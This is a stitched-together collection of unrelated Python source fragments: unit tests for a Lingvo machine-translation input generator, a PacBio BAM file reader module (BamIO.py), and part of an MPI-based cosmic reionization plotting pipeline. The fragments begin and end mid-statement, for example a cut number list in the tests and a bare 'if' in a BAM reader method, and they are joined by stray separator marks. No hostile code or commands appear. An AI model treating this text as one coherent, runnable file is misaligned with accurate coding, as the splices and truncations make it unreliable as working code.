Check(fetched.tgt.weights, 0)
Check(fetched.tgt.paddings, 1)
def testPadToMax(self):
p = self._CreateNmtInputParams()
p.bucket_upper_bound = [20]
p.bucket_batch_limit = [4]
p.source_max_length = 30
p.target_max_length = 30
p.pad_to_max_seq_length = True
with self.session(use_gpu=False):
inp = input_generator.NmtInput(p)
fetched = py_utils.NestedMap(
self.evaluate(inp.GetPreprocessedInputBatch()))
def Check(x, pad):
# Check the shape: (batch, maxlen)
self.assertEqual(x.shape, (4, 30))
# Check the padding.
self.assertAllEqual(x[:, 20:], np.full((4, 10), pad))
Check(fetched.src.ids, 0)
Check(fetched.src.paddings, 1)
Check(fetched.tgt.ids, 0)
Check(fetched.tgt.labels, 0)
Check(fetched.tgt.weights, 0)
Check(fetched.tgt.paddings, 1)
def testSplitSources(self):
p = self._CreateNmtInputParams()
num_splits = 2
expected_ids_split_1 = [
[
93, 15027, 643, 8, 2985, 3, 27025, 6, 4569, 2, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0
],
[
15027, 1668, 4125, 54, 139, 24, 3, 101, 8, 2031, 5545, 2962, 5, 2,
0, 0, 0, 0, 0, 0
],
]
expected_ids_split_2 = [
[
626, 854, 11, 392, 45, 77, 67, 1346, 30, 25, 10, 2283, 933, 14,
22255, 425, 872, 4677, 5, 2
],
[
52, 21, 1034, 4, 3, 274, 30, 7203, 6275, 3, 967, 795, 142, 5, 2, 0,
0, 0, 0, 0
],
]
with self.session(use_gpu=False):
inp = input_generator.NmtInput(p)
splits = inp.SplitInputBatch(num_splits)
split_ids = self.evaluate([splits[0].src.ids, splits[1].src.ids])
tf.logging.info('split_ids[0] = %r', split_ids[0])
tf.logging.info('split_ids[1] = %r', split_ids[1])
self.assertAllEqual(expected_ids_split_1, split_ids[0])
self.assertAllEqual(expected_ids_split_2, split_ids[1])
def testSplitTargets(self):
p = self._CreateNmtInputParams()
num_splits = 2
with self.session(use_gpu=False):
inp = input_generator.NmtInput(p)
fetched = self.evaluate(inp.SplitInputBatch(num_splits))
expected_ids_split_1 = [
[
1, 272, 7514, 10944, 2220, 815, 3, 39, 6, 3021, 4893, 10, 6693,
23788, 3410, 0, 0, 0, 0
],
[
1, 28, 18764, 6, 1413, 2338, 8068, 107, 431, 14, 6, 1083, 3, 11,
782, 19664, 9, 3622, 4
],
]
expected_ids_split_2 = [
[
1, 15149, 12, 583, 43, 61, 179, 1265, 22, 27, 7193, 16, 5, 782,
14077, 6734, 4, 0, 0
],
[
1, 81, 90, 1397, 9207, 61, 241, 2102, 15, 3003, 424, 6, 483, 4, 0,
0, 0, 0, 0
],
]
tf.logging.info('fetched[0].tgt.ids = %r', fetched[0].tgt.ids)
tf.logging.info('fetched[1].tgt.ids = %r', fetched[1].tgt.ids)
self.assertAllEqual(expected_ids_split_1, fetched[0].tgt.ids)
self.assertAllEqual(expected_ids_split_2, fetched[1].tgt.ids)
def testTextPackedInputProto(self):
p = input_generator.TextPackedInput.Params()
p.flush_every_n = 0
p.repeat_count = 1
p.file_pattern = 'tfrecord:' + test_helper.test_src_dir_path(
'tasks/mt/testdata/en_fr.tfrecord')
p.pad_to_max_seq_length = True
p.tokenizer = tokenizers.AsciiTokenizer.Params()
p.input_file_type = 'sentence_proto'
p.source_max_length = 22
p.target_max_length = 24
p.bucket_batch_limit = [2]
with self.session() as sess:
inp = p.Instantiate()
batch_tensor = inp.GetPreprocessedInputBatch()
for k, x in batch_tensor.FlattenItems():
self.assertTrue(x.shape.is_fully_defined(), k)
batch = sess.run(batch_tensor)
self.assertLen(batch.src, 8)
self.assertAllEqual(batch.src.strs,
[b'I love paragliding!', b'vol biv paragliding'])
self.assertAllEqual(batch.tgt.strs,
[b"J'adore le parapente!", b'vol biv parapente'])
self.assertAllEqual(
batch.src.ids,
np.array([
[
13, 3, 16, 19, 26, 9, 3, 20, 5, 22, 5, 11, 16, 13, 8, 13, 18,
11, 35, 2, 0, 0
],
[
26, 19, 16, 3, 6, 13, 26, 3, 20, 5, 22, 5, 11, 16, 13, 8, 13,
18, 11, 2, 0, 0
],
]))
self.assertAllEqual(
batch.tgt.ids,
np.array([
[
1, 14, 32, 5, 8, 19, 22, 9, 3, 16, 9, 3, 20, 5, 22, 5, 20, 9,
18, 24, 9, 35, 0, 0
],
[
1, 26, 19, 16, 3, 6, 13, 26, 3, 20, 5, 22, 5, 20, 9, 18, 24, 9,
0, 0, 0, 0, 0, 0
],
]))
self.assertAllEqual(
batch.tgt.labels,
np.array([
[
14, 32, 5, 8, 19, 22, 9, 3, 16, 9, 3, 20, 5, 22, 5, 20, 9, 18,
24, 9, 35, 2, 0, 0
],
[
26, 19, 16, 3, 6, 13, 26, 3, 20, 5, 22, 5, 20, 9, 18, 24, 9, 2,
0, 0, 0, 0, 0, 0
],
]))
@parameterized.named_parameters(
('no_per_host_infeed_no_packing', False, None),
('per_host_infeed_no_packing', True, None),
('no_per_host_infeed_with_packing', False, 3.5),
('per_host_infeed_with_packing', True, 3.5))
def testTextPackedInputBatchSize(self, use_per_host_infeed, packing_factor):
p = cluster_factory.Current().params.Copy()
p.job = 'trainer'
p.worker.tpus_per_replica = 8
p.worker.num_tpu_hosts = 16
p.worker.devices_per_split = 2
cluster = p.Instantiate()
with cluster, mock.patch('lingvo.core.py_utils.use_tpu', return_value=True):
p = input_generator.TextPackedInput.Params()
p.use_per_host_infeed = use_per_host_infeed
p.file_random_seed = 0
p.file_pattern = 'tfrecord:' + test_helper.test_src_dir_path(
'tasks/mt/testdata/en_fr.tfrecord')
p.pad_to_max_seq_length = True
p.tokenizer = tokenizers.AsciiTokenizer.Params()
p.input_file_type = 'sentence_proto'
p.source_max_length = 32
p.target_max_length = 32
p.bucket_batch_limit = [128]
p.packing_factor = packing_factor
with self.session() as sess:
inp = p.Instantiate()
# GlobalBatchSize is batch_size (128) * num_splits_per_client (4).
# num_splits_per_client is 4, because num_splits_per_replica is 4.
# num_splits_per_replica is 4 because that's tpus_per_replica
# divided by devices_per_split.
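      # Illustrative arithmetic for the packed, per-host case: 128 // 2 * 8 = 512
      # global; packing_factor 3.5 -> floor(512 * 3.5) = 1792 infeed total;
      # 1792 // 16 hosts = 112 per host; packed infeed batch floor(112 / 3.5) = 32.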
expected_global_batch_size = (
p.bucket_batch_limit[0] // cluster.params.worker.devices_per_split *
cluster.params.worker.tpus_per_replica)
if p.packing_factor is not None:
expected_global_batch_size = np.math.floor(
expected_global_batch_size * p.packing_factor)
expected_infeed_batch_size = expected_global_batch_size
if use_per_host_infeed:
expected_infeed_batch_size = (
expected_global_batch_size // cluster.params.worker.num_tpu_hosts)
expected_packed_infeed_batch_size = expected_infeed_batch_size
if p.packing_factor is not None:
expected_packed_infeed_batch_size = np.math.floor(
expected_infeed_batch_size / p.packing_factor)
self.assertEqual(expected_global_batch_size, inp.GlobalBatchSize())
self.assertEqual(expected_infeed_batch_size, inp.InfeedBatchSize())
batch_tensor = inp.GetPreprocessedInputBatch()
for k, x in batch_tensor.FlattenItems():
self.assertTrue(x.shape.is_fully_defined(), k)
batch = sess.run(batch_tensor)
self.assertEqual(batch.src.ids.shape,
(expected_packed_infeed_batch_size, 32))
def testTextPackedInputTextWpm(self):
p = input_generator.TextPackedInput.Params()
p.flush_every_n = 0
p.repeat_count = 1
p.file_pattern = 'text:' + test_helper.test_src_dir_path(
'tasks/mt/testdata/en_de.text')
p.tokenizer = tokenizers.WpmTokenizer.Params().Set(
vocab_filepath=test_helper.test_src_dir_path(
'tasks/mt/wpm-ende-2k.voc'),
vocab_size=2000)
p.source_max_length = 12
p.target_max_length = 15
p.bucket_batch_limit = [2]
with self.session() as sess:
inp = p.Instantiate()
batch_tensor = inp.GetPreprocessedInputBatch()
batch = sess.run(batch_tensor)
print(batch)
self.assertAllEqual(
batch.src.ids,
np.array([[109, 251, 98, 595, 1009, 245, 326, 129, 4, 2, 0, 0],
[115, 276, 18, 66, 2, 0, 0, 0, 0, 0, 0, 0]]))
self.assertAllEqual(
batch.tgt.ids,
np.array([[
1, 197, 446, 458, 419, 284, 323, 1411, 571, 456, 409, 13, 4, 0, 0
], [1, 115, 281, 18, 66, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]]))
self.assertAllEqual(
batch.tgt.labels,
np.array([[
197, 446, 458, 419, 284, 323, 1411, 571, 456, 409, 13, 4, 2, 0, 0
], [115, 281, 18, 66, | |
<filename>pbcore/io/align/BamIO.py
# Author: <NAME>
__all__ = [ "BamReader", "IndexedBamReader" ]
try:
from pysam.calignmentfile import AlignmentFile # pylint: disable=no-name-in-module, import-error, fixme, line-too-long
except ImportError:
from pysam.libcalignmentfile import AlignmentFile # pylint: disable=no-name-in-module, import-error, fixme, line-too-long
from pbcore.io import FastaTable
from pbcore.chemistry import decodeTriple, ChemistryLookupError
import numpy as np
from itertools import groupby
from functools import wraps
from os.path import abspath, expanduser, exists
from ..base import ReaderBase
from .PacBioBamIndex import PacBioBamIndex
from .BamAlignment import *
from ._BamSupport import *
from ._AlignmentMixin import AlignmentReaderMixin, IndexedAlignmentReaderMixin
def requiresBai(method):
@wraps(method)
def f(bamReader, *args, **kwargs):
if not bamReader.peer.has_index():
            raise UnavailableFeature("this feature requires a standard BAM index file (bam.bai)")
else:
return method(bamReader, *args, **kwargs)
return f
class _BamReaderBase(ReaderBase):
"""
The BamReader class provides a high-level interface to PacBio BAM
files. If a PacBio BAM index (bam.pbi file) is present and the
user instantiates the BamReader using the reference FASTA as the
second argument, the BamReader will provide an interface
compatible with CmpH5Reader.
"""
def _loadReferenceInfo(self):
refRecords = self.peer.header["SQ"]
refNames = [r["SN"] for r in refRecords]
refLengths = [r["LN"] for r in refRecords]
refMD5s = [r["M5"] for r in refRecords]
refIds = list(map(self.peer.get_tid, refNames))
nRefs = len(refRecords)
if nRefs > 0:
self._referenceInfoTable = np.rec.fromrecords(list(zip(
refIds,
refIds,
refNames,
refNames,
refLengths,
refMD5s,
np.zeros(nRefs, dtype=np.uint32),
np.zeros(nRefs, dtype=np.uint32))),
dtype=[('ID', '<i8'), ('RefInfoID', '<i8'),
('Name', 'O'), ('FullName', 'O'),
('Length', '<i8'), ('MD5', 'O'),
('StartRow', '<u4'), ('EndRow', '<u4')])
self._referenceDict = {}
self._referenceDict.update(list(zip(refIds, self._referenceInfoTable)))
self._referenceDict.update(list(zip(refNames, self._referenceInfoTable)))
else:
self._referenceInfoTable = None
self._referenceDict = None
def _loadReadGroupInfo(self):
rgs = self.peer.header["RG"]
readGroupTable_ = []
# RGID -> ("abstract feature name" -> actual feature name)
self._baseFeatureNameMappings = {}
self._pulseFeatureNameMappings = {}
for rg in rgs:
rgID = rgAsInt(rg["ID"])
rgName = rg["PU"]
ds = dict([pair.split("=") for pair in rg["DS"].split(";") if pair != ""])
# spec: we only consider first two components of basecaller version
# in "chem" lookup
rgReadType = ds["READTYPE"]
rgChem = "unknown"
rgFrameRate = 0.0
if rgReadType != "TRANSCRIPT":
rgFrameRate = ds["FRAMERATEHZ"]
basecallerVersion = ".".join(ds["BASECALLERVERSION"].split(".")[0:2])
triple = ds["BINDINGKIT"], ds["SEQUENCINGKIT"], basecallerVersion
rgChem = decodeTriple(*triple)
# Look for the features manifest entries within the DS tag,
# and build an "indirection layer", i.e. to get from
# "Ipd" to "Ipd:Frames"
# (This is a bit messy. Can we separate the manifest from
# the rest of the DS content?)
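            # e.g. a DS manifest entry "Ipd:Frames" produces the mapping
            # {"Ipd": "Ipd:Frames"} (illustrative; the actual tags depend on
            # the read group's DS header content).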
baseFeatureNameMapping = { key.split(":")[0] : key
for key in list(ds.keys())
if key in BASE_FEATURE_TAGS }
pulseFeatureNameMapping = { key.split(":")[0] : key
for key in list(ds.keys())
if key in PULSE_FEATURE_TAGS }
self._baseFeatureNameMappings[rgID] = baseFeatureNameMapping
self._pulseFeatureNameMappings[rgID] = pulseFeatureNameMapping
readGroupTable_.append((rgID, rgName, rgReadType, rgChem, rgFrameRate,
frozenset(iter(baseFeatureNameMapping.keys()))))
self._readGroupTable = np.rec.fromrecords(
readGroupTable_,
dtype=[("ID" , np.int32),
("MovieName" , "O"),
("ReadType" , "O"),
("SequencingChemistry", "O"),
("FrameRate", float),
("BaseFeatures", "O")])
assert len(set(self._readGroupTable.ID)) == len(self._readGroupTable), \
"First 8 chars of read group IDs must be unique!"
self._readGroupDict = { rg.ID : rg
for rg in self._readGroupTable }
# The base/pulse features "available" to clients of this file are the intersection
# of features available from each read group.
self._baseFeaturesAvailable = set.intersection(
*[set(mapping.keys()) for mapping in list(self._baseFeatureNameMappings.values())])
self._pulseFeaturesAvailable = set.intersection(
*[set(mapping.keys()) for mapping in list(self._pulseFeatureNameMappings.values())])
def _loadProgramInfo(self):
pgRecords = [ (pg["ID"], pg.get("VN", None), pg.get("CL", None))
for pg in self.peer.header.get("PG", []) ]
if len(pgRecords) > 0:
self._programTable = np.rec.fromrecords(
pgRecords,
dtype=[("ID" , "O"),
("Version", "O"),
("CommandLine", "O")])
else:
self._programTable = None
def _loadReferenceFasta(self, referenceFastaFname):
ft = FastaTable(referenceFastaFname)
# Verify that this FASTA is in agreement with the BAM's
# reference table---BAM should be a subset.
fastaIdsAndLens = set((c.id, len(c)) for c in ft)
bamIdsAndLens = set((c.Name, c.Length) for c in self.referenceInfoTable)
if not bamIdsAndLens.issubset(fastaIdsAndLens):
raise ReferenceMismatch("FASTA file must contain superset of reference contigs in BAM")
self.referenceFasta = ft
def _checkFileCompatibility(self):
# Verify that this is a "pacbio" BAM file of version at least
# 3.0.1
badVersionException = IncompatibleFile(
"This BAM file is incompatible with this API " +
"(only PacBio BAM files version >= 3.0.1 are supported)")
checkedVersion = self.version
if "b" in checkedVersion:
raise badVersionException
else:
            major, minor, patch = checkedVersion.split('.')
            if (int(major), int(minor), int(patch)) < (3, 0, 1):
                raise badVersionException
def __init__(self, fname, referenceFastaFname=None):
self.filename = fname = abspath(expanduser(fname))
self.peer = AlignmentFile(fname, "rb", check_sq=False)
self._checkFileCompatibility()
self._loadReferenceInfo()
self._loadReadGroupInfo()
self._loadProgramInfo()
self.referenceFasta = None
if referenceFastaFname is not None:
if self.isUnmapped:
raise ValueError("Unmapped BAM file--reference FASTA should not be given as argument to BamReader")
self._loadReferenceFasta(referenceFastaFname)
@property
def isIndexLoaded(self):
return self.index is not None # pylint: disable=no-member
@property
def isReferenceLoaded(self):
return self.referenceFasta is not None
@property
def isUnmapped(self):
return not(self.isMapped)
@property
def isMapped(self):
return len(self.peer.header["SQ"]) > 0
@property
def alignmentIndex(self):
raise UnavailableFeature("BAM has no alignment index")
@property
def movieNames(self):
return set([mi.MovieName for mi in self.readGroupTable])
@property
def readGroupTable(self):
return self._readGroupTable
def readGroupInfo(self, readGroupId):
return self._readGroupDict[readGroupId]
@property
def sequencingChemistry(self):
"""
List of the sequencing chemistries by movie. Order is
unspecified.
"""
return list(self.readGroupTable.SequencingChemistry)
@property
def referenceInfoTable(self):
return self._referenceInfoTable
#TODO: standard? how about subread instead? why capitalize ccs?
# can we standardize this? is cDNA an additional possibility
@property
def readType(self):
"""
Either "standard", "CCS", "mixed", or "unknown", to represent the
type of PacBio reads aligned in this BAM file.
"""
readTypes = self.readGroupTable.ReadType
if all(readTypes == "SUBREAD"):
return "standard"
elif all(readTypes == "CCS"):
return "CCS"
elif all(readTypes == "TRANSCRIPT"):
return "TRANSCRIPT"
elif all((readTypes == "CCS") | (readTypes == "SUBREAD")):
return "mixed"
else:
return "unknown"
@property
def version(self):
return self.peer.header["HD"]["pb"]
def versionAtLeast(self, minimalVersion):
raise Unimplemented()
def softwareVersion(self, programName):
raise Unimplemented()
@property
def isSorted(self):
return self.peer.header["HD"]["SO"] == "coordinate"
@property
def isBarcoded(self):
raise Unimplemented()
@property
def isEmpty(self):
return (len(self) == 0)
def referenceInfo(self, key):
return self._referenceDict[key]
def atOffset(self, offset):
self.peer.seek(offset)
return BamAlignment(self, next(self.peer))
def hasBaseFeature(self, featureName):
return featureName in self._baseFeaturesAvailable
def baseFeaturesAvailable(self):
return self._baseFeaturesAvailable
def hasPulseFeature(self, featureName):
return featureName in self._pulseFeaturesAvailable
def pulseFeaturesAvailable(self):
return self._pulseFeaturesAvailable
def hasPulseFeatures(self):
"""
Is this BAM file a product of running analysis with the
PacBio-internal analysis mode enabled?
"""
return self.hasPulseFeature("PulseCall")
@property
def barcode(self):
raise Unimplemented()
@property
def barcodeName(self):
raise Unimplemented()
@property
def barcodes(self):
raise Unimplemented()
@requiresBai
def __len__(self):
return self.peer.mapped + self.peer.unmapped
def close(self):
if hasattr(self, "file") and self.file is not None:
self.file.close()
self.file = None
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, traceback):
self.close()
class BamReader(_BamReaderBase, AlignmentReaderMixin):
"""
Reader for a BAM with a bam.bai (SAMtools) index, but not a
bam.pbi (PacBio) index. Supports basic BAM operations.
"""
def __init__(self, fname, referenceFastaFname=None):
super(BamReader, self).__init__(fname, referenceFastaFname)
@property
def index(self):
return None
def __iter__(self):
self.peer.reset()
for a in self.peer:
yield BamAlignment(self, a)
def readsInRange(self, winId, winStart, winEnd, justIndices=False):
# PYSAM BUG: fetch doesn't work if arg 1 is tid and not rname
if not isinstance(winId, str):
winId = self.peer.get_reference_name(winId)
if justIndices == True:
raise UnavailableFeature("BAM is not random-access")
else:
return ( BamAlignment(self, it)
for it in self.peer.fetch(winId, winStart, winEnd, multiple_iterators=False) )
def __getitem__(self, rowNumbers):
raise UnavailableFeature("Use IndexedBamReader to get row-number based slicing.")
class IndexedBamReader(_BamReaderBase, IndexedAlignmentReaderMixin):
"""
    An `IndexedBamReader` is a BAM reader class that uses the
    ``bam.pbi`` (PacBio BAM index) file to enable random access by
    "row number" and to provide access to precomputed semantic
    information about the BAM records.
"""
def __init__(self, fname, referenceFastaFname=None, sharedIndex=None):
super(IndexedBamReader, self).__init__(fname, referenceFastaFname)
if sharedIndex is None:
self.pbi = None
pbiFname = self.filename + ".pbi"
if exists(pbiFname):
self.pbi = PacBioBamIndex(pbiFname)
else:
raise IOError("IndexedBamReader requires bam.pbi index file "+
"to read {f}".format(f=fname))
else:
self.pbi = sharedIndex
@property
def index(self):
return self.pbi
def atRowNumber(self, rn):
offset = self.pbi.virtualFileOffset[rn]
self.peer.seek(offset)
return BamAlignment(self, next(self.peer), rn)
def readsInRange(self, winId, winStart, winEnd, justIndices=False):
if isinstance(winId, str):
winId = self.referenceInfo(winId).ID
ix = self.pbi.rangeQuery(winId, winStart, winEnd)
if justIndices:
return ix
else:
return self[ix]
def __iter__(self):
self.peer.reset()
for (rowNumber, peerRecord) in enumerate(self.peer):
yield BamAlignment(self, peerRecord, rowNumber)
def __len__(self):
return len(self.pbi)
def __getitem__(self, rowNumbers):
if (isinstance(rowNumbers, int) or
issubclass(type(rowNumbers), np.integer)):
return self.atRowNumber(rowNumbers)
elif isinstance(rowNumbers, slice):
return ( self.atRowNumber(r)
for r in range(*rowNumbers.indices(len(self))))
elif isinstance(rowNumbers, list) or isinstance(rowNumbers, np.ndarray):
if len(rowNumbers) == 0:
return []
else:
entryType = type(rowNumbers[0])
if entryType == int or issubclass(entryType, np.integer):
return ( self.atRowNumber(r) for r in rowNumbers )
elif entryType == bool or issubclass(entryType, np.bool_):
return ( self.atRowNumber(r) for r in np.flatnonzero(rowNumbers) )
raise TypeError("Invalid type for IndexedBamReader slicing")
def __getattr__(self, key):
if | |
{0}".format(output_dir))
MC_dir = "{0}/MC".format(output_dir)
os.makedirs(MC_dir)
print("Made directory {0}".format(MC_dir))
# First calculate all the properties and statistics we need.
reion_data = generate_data(rank, size, comm, reion_ini_files,
gal_ini_files, reion_plots, output_dir,
model_tags, output_format)
# Gather all the fractions onto the master process.
# This will be used for many different plots.
master_mass_frac = collective.collect_hist_across_tasks(rank, comm,
reion_data["mass_frac_allmodels"])
master_mass_frac = comm.bcast(master_mass_frac, root = 0)
# Then find out what we need and plot em!
if reion_plots["history"] and rank == 0:
duration_z, duration_t, reion_completed = \
calc_duration(reion_data["z_array_reion_allmodels"],
reion_data["lookback_array_reion_allmodels"],
master_mass_frac, reion_plots["duration_definition"])
for model_number in range(len(master_mass_frac)):
print("Model {0}: Start {1:.2f} \tMid {2:.2f}\tEnd {3:.2f}\t"
"dz {4:.2f}\tdt {5:.1f}Myr\tReion Completed {6}" \
.format(model_number, duration_z[model_number][0],
duration_z[model_number][1], duration_z[model_number][-1],
duration_z[model_number][0]-duration_z[model_number][-1],
duration_t[model_number][-1]-duration_t[model_number][0],
reion_completed[model_number]))
print("Plotting the reionization history.")
reionplot.plot_history(reion_data["z_array_reion_allmodels"],
reion_data["lookback_array_reion_allmodels"],
reion_data["cosmology_allmodels"],
reion_data["t_bigbang_allmodels"],
master_mass_frac,
model_tags, output_dir, "history",
output_format)
if reion_plots["nion"]:
master_nion = collective.collect_hist_across_tasks(rank, comm,
reion_data["nion_allmodels"])
if rank == 0:
print("Plotting the ionizing emissivity.")
reionplot.plot_nion(reion_data["z_array_reion_allmodels"],
reion_data["lookback_array_reion_allmodels"],
reion_data["cosmology_allmodels"],
reion_data["t_bigbang_allmodels"],
master_nion,
reion_data["nion_factor_allmodels"],
model_tags, output_dir, "nion", output_format)
if reion_plots["ps_fixed_XHI"]:
k, P21, PHII = determine_ps_fixed_XHI(rank, size, comm,
reion_data["z_array_reion_allmodels"],
reion_data["cosmology_allmodels"],
master_mass_frac,
reion_data["XHII_fbase_allmodels"],
reion_data["XHII_precision_allmodels"],
reion_data["density_fbase_allmodels"],
reion_data["density_precision_allmodels"],
reion_data["GridSize_allmodels"],
reion_data["boxsize_allmodels"],
reion_data["first_snap_allmodels"],
reion_plots["fixed_XHI_values"])
if rank == 0:
print("Plotting PS at fixed neutral fraction.")
reionplot.plot_ps_fixed_XHI(k, P21, PHII,
reion_plots["fixed_XHI_values"],
model_tags, output_dir, "ps_fixed_XHI",
output_format)
if reion_plots["contours"] and rank == 0:
# tau is used for multiple plots. So check if we need to calculate it.
try:
tau_allmodels
except NameError:
tau_allmodels = calc_tau(reion_data["z_array_reion_allmodels"],
reion_data["cosmology_allmodels"],
reion_data["helium_allmodels"],
master_mass_frac)
# For the contours, only plot the optical depth at the highest z.
tau_highz = []
for model_number in range(len(tau_allmodels)):
tau_highz.append(tau_allmodels[model_number][0])
duration_z, duration_t, reion_completed = \
calc_duration(reion_data["z_array_reion_allmodels"],
reion_data["lookback_array_reion_allmodels"],
master_mass_frac, reion_plots["duration_definition"])
print("Plotting contours of constant tau.")
reionplot.plot_tau_contours(tau_highz, reion_completed,
reion_plots["alpha_beta_limits"],
output_dir, "tau_contours", output_format)
print("Plotting contours of constant reionization duration.")
reionplot.plot_duration_contours(duration_t, reion_completed,
reion_plots["alpha_beta_limits"],
output_dir, "duration_contours",
output_format)
if reion_plots["optical_depth"] and rank == 0:
# tau is used for multiple plots. So check if we need to calculate it.
try:
tau_allmodels
except NameError:
tau_allmodels = calc_tau(reion_data["z_array_reion_allmodels"],
reion_data["cosmology_allmodels"],
reion_data["helium_allmodels"],
master_mass_frac)
print("Plotting the optical depth.")
reionplot.plot_tau(reion_data["z_array_reion_allmodels"],
reion_data["lookback_array_reion_allmodels"],
reion_data["cosmology_allmodels"],
reion_data["t_bigbang_allmodels"],
tau_allmodels,
model_tags, output_dir, "optical_depth",
output_format)
if reion_plots["optical_depth"] and reion_plots["history"] and rank == 0:
print("Plotting the combined optical depth/ionization history.")
reionplot.plot_combined_history_tau(reion_data["z_array_reion_allmodels"],
reion_data["lookback_array_reion_allmodels"],
reion_data["cosmology_allmodels"],
reion_data["t_bigbang_allmodels"],
master_mass_frac, tau_allmodels,
model_tags, output_dir,
"history_tau", output_format)
if reion_plots["optical_depth"] and reion_plots["nion"] and rank == 0:
print("Plotting the combined optical depth/ionizing emissivity.")
reionplot.plot_combined_nion_tau(reion_data["z_array_reion_allmodels"],
reion_data["lookback_array_reion_allmodels"],
reion_data["cosmology_allmodels"],
reion_data["t_bigbang_allmodels"],
master_nion,
reion_data["nion_factor_allmodels"],
tau_allmodels, model_tags, output_dir,
"nion_tau", output_format)
if reion_plots["ps_scales"] or reion_plots["ps_scales_beta"]:
print("Gathering the 21cm Power Spectra across processors")
k, P21, PHII = gather_ps(rank, size, comm,
reion_data["k_allmodels"],
reion_data["P21_allmodels"],
reion_data["PHII_allmodels"],
reion_data["first_snap_allmodels"],
reion_data["last_snap_allmodels"])
if rank == 0:
print("Plotting the large scale power as a function of small "
"scale.")
if reion_plots["ps_scales_beta"]:
calc_beta = True
else:
calc_beta = False
# Now that we have all the PS on the master rank, calculate the
# amplitude at the specified scales.
scale_power_dict = calc_scale_power(k, P21, PHII,
reion_data["z_array_reion_allmodels"],
reion_plots["small_scale_def"],
reion_plots["large_scale_def"],
reion_plots["small_scale_err"],
reion_plots["large_scale_err"],
calc_beta=calc_beta)
k_small_scale = scale_power_dict["k_small_scale"]
k_large_scale = scale_power_dict["k_large_scale"]
P21_small_scale = scale_power_dict["P21_small_scale"]
P21_large_scale = scale_power_dict["P21_large_scale"]
PHII_small_scale = scale_power_dict["PHII_small_scale"]
PHII_large_scale = scale_power_dict["PHII_large_scale"]
if reion_plots["ps_scales"]:
reionplot.plot_ps_scales(P21_small_scale,
P21_large_scale, master_mass_frac,
reion_data["z_array_reion_allmodels"],
reion_plots["fixed_XHI_values"],
reion_plots["ps_scales_z"],
reion_plots["small_scale_def"],
reion_plots["large_scale_def"],
reion_plots["small_scale_err"],
reion_plots["large_scale_err"],
model_tags, output_dir, "ps_scales",
output_format)
if reion_plots["ps_scales_beta"]:
P21_beta = scale_power_dict["P21_beta"]
P21_beta_error = scale_power_dict["P21_beta_error"]
PHII_beta = scale_power_dict["PHII_beta"]
reionplot.plot_ps_beta(P21_beta, P21_beta_error,
reion_data["z_array_reion_allmodels"],
reion_data["lookback_array_reion_allmodels"],
reion_data["cosmology_allmodels"],
reion_data["t_bigbang_allmodels"],
reion_plots["small_scale_def"],
reion_plots["large_scale_def"],
model_tags, output_dir,
"ps_scales_beta", output_format)
if reion_plots["slices_fixed_XHI"] and rank == 0:
print("Plotting slices at fixed XHI fractions.")
reionplot.plot_slices_XHI(reion_data["z_array_reion_allmodels"],
reion_data["cosmology_allmodels"],
master_mass_frac,
reion_data["XHII_fbase_allmodels"],
reion_data["XHII_precision_allmodels"],
reion_data["GridSize_allmodels"],
reion_data["boxsize_allmodels"],
reion_data["first_snap_allmodels"],
reion_plots["fixed_XHI_values"],
reion_plots["cut_slice"],
reion_plots["cut_thickness"],
model_tags, output_dir, "slices_XHI",
output_format)
if reion_plots["bubble_size"] and rank == 0:
print("Determining bubble sizes at fixed XHI.")
reionplot.determine_bubble_size(reion_data["z_array_reion_allmodels"],
master_mass_frac,
reion_data["first_snap_allmodels"],
reion_data["GridSize_allmodels"],
reion_data["boxsize_allmodels"],
reion_plots["fixed_XHI_values"],
model_tags, output_dir)
if reion_plots["zreion_dens_cross"] and rank == 0:
print("Calculating the zreion-density cross correlation.")
k, crosspspec, crosscorr, bias = \
zreion_dens_cross(reion_data["density_fbase_allmodels"],
reion_data["density_precision_allmodels"],
reion_data["zreion_path_allmodels"],
reion_data["GridSize_allmodels"],
reion_data["boxsize_allmodels"],
reion_data["last_snap_allmodels"])
reionplot.plot_zreion_dens_cross(k, crosscorr, bias, model_tags,
output_dir, "zreion_dens_crosscorr",
output_format)
if reion_plots["dens_ion_contours"] and rank == 0:
print("Plotting contours of density-ionization.")
reionplot.plot_dens_reion_contours(master_mass_frac,
reion_data["XHII_fbase_allmodels"],
reion_data["XHII_precision_allmodels"],
reion_data["density_fbase_allmodels"],
reion_data["density_precision_allmodels"],
reion_data["GridSize_allmodels"],
reion_data["first_snap_allmodels"],
reion_plots["fixed_XHI_values"],
model_tags, output_dir,
"dens_ion_contours", output_format)
if reion_plots["dens_zreion_contours"] and rank == 0:
print("Plotting contours of density-zreion.")
reionplot.plot_dens_zreion_contours(reion_data["density_fbase_allmodels"],
reion_data["density_precision_allmodels"],
reion_data["zreion_path_allmodels"],
reion_data["GridSize_allmodels"],
reion_data["last_snap_allmodels"],
model_tags, output_dir,
"dens_zreion_contours", output_format)
def generate_data(rank, size, comm, reion_ini_files, gal_ini_files,
reion_plots, output_dir, model_tags, output_format):
"""
Reads in the galaxy data and calculates all the required properties for each
model.
Parameters
----------
rank : Integer
This processor rank.
size : Integer
The total number of processors executing the pipeline.
comm : Class ``mpi4py.MPI.Intracomm``
The ``mpi4py`` communicator.
reion_ini_files, gal_ini_files : List of strings
``.ini`` file corresponding to each model that we're plotting. We need
both the galaxy (``SAGE``) and reionization (``cifog``) ``.ini`` files.
reion_plots : Dictionary
Controls which of the plots we will make. Keys are the name of each
plot (e.g., ``reion``) and the value specifies whether we are plotting it.
If we're not plotting a property, we don't need to calculate anything for it.
output_dir : String
Directory where the plots are saved. Used to save MC data.
model_tags : List of strings
String that will appear on the legend of the plot for each model. Used
to save MC data with a unique name.
Returns
---------
reion_data : Dictionary
All of the calculated properties required to create the reionization
plots.
"""
if rank == 0:
print("Generating reionization data for a total of {0} "
"models and saving plots in directory {1}" \
.format(len(reion_ini_files), output_dir))
# ======================================================================= #
# We calculate values for all models and put them into lists that are #
# indexed by ``model_number``. So first we need to set up the outer-lists #
# then we will append to these for each model. #
# ======================================================================= #
# Unlike GalaxyData where we use the whole redshift range, here we only use
# the range that covers reionization.
z_array_reion_allmodels = []
lookback_array_reion_allmodels = []
# Since we calculate some things after the main loop, need to remember the
# file names/precisions for each model.
XHII_fbase_allmodels = []
XHII_precision_allmodels = []
density_fbase_allmodels = []
density_precision_allmodels = []
zreion_path_allmodels = []
first_snap_allmodels = []
last_snap_allmodels = []
GridSize_allmodels = []
boxsize_allmodels = []
helium_allmodels = []
